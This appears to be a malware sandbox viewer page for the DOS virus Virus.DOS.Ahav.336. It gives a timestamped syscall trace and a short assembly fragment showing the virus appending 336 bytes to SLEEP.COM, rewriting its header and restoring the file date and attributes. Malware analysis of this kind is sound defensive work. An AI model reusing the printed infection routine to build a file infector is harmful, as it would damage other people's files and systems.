Sample viewer

vx.netlux.org/Virus.DOS.Ahav.336

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:36.749987714Z 53 PC: 12b3a | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:36.751733353Z 37 PC: 12b4b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:11:36.755014625Z 26 PC: 12a61 | Set disk transfer address
2018-12-17T23:11:36.756307013Z 78 PC: 12a6a | Find first file
2018-12-17T23:11:36.763324678Z 61 PC: 12a75 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:11:36.778926709Z 63 PC: 12a81 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:11:36.786872069Z 44 PC: 12acf | Get time 0x12acf: mov word ptr [bp + 0x24a], dx
0x12ad3: call 0x22ac2
0x12ad6: lea si, word ptr [bp + 0x265]
0x12ada: mov cx, 9
0x12add: lea di, word ptr [bp + 0x23d]
0x12ae1: rep movsb byte ptr es:[di], byte ptr [si]
0x12ae3: mov ax, 0x4202
0x12ae6: xor dx, dx
0x12ae8: xor cx, cx
0x12aea: int 0x21
0x12aec: sub ax, 3
0x12aef: mov word ptr [bp + 0x23a], ax
0x12af3: mov ah, 0x40
0x12af5: mov cx, 0x150
0x12af8: lea dx, word ptr [bp + 0x100]
0x12afc: int 0x21
0x12afe: mov ax, 0x4200
0x12b01: xor cx, cx
0x12b03: xor dx, dx
0x12b05: int 0x21
2018-12-17T23:11:36.792615026Z 66 PC: 12aec | Move file pointer
2018-12-17T23:11:36.797237132Z 64 PC: 12afe | Write file or device (Write 336 bytes on handle 5)
2018-12-17T23:11:36.822793037Z 66 PC: 12b07 | Move file pointer
2018-12-17T23:11:36.82499928Z 64 PC: 12b12 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:11:36.838844243Z 87 PC: 12b20 | Get or set file date and time
2018-12-17T23:11:36.840986825Z 62 PC: 12b24 | Close file
2018-12-17T23:11:36.851229362Z 67 PC: 12b34 | Get or set file attributes
2018-12-17T23:11:36.865040588Z 26 PC: 12ab2 | Set disk transfer address
2018-12-17T23:11:36.867808063Z 37 PC: 12b5f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')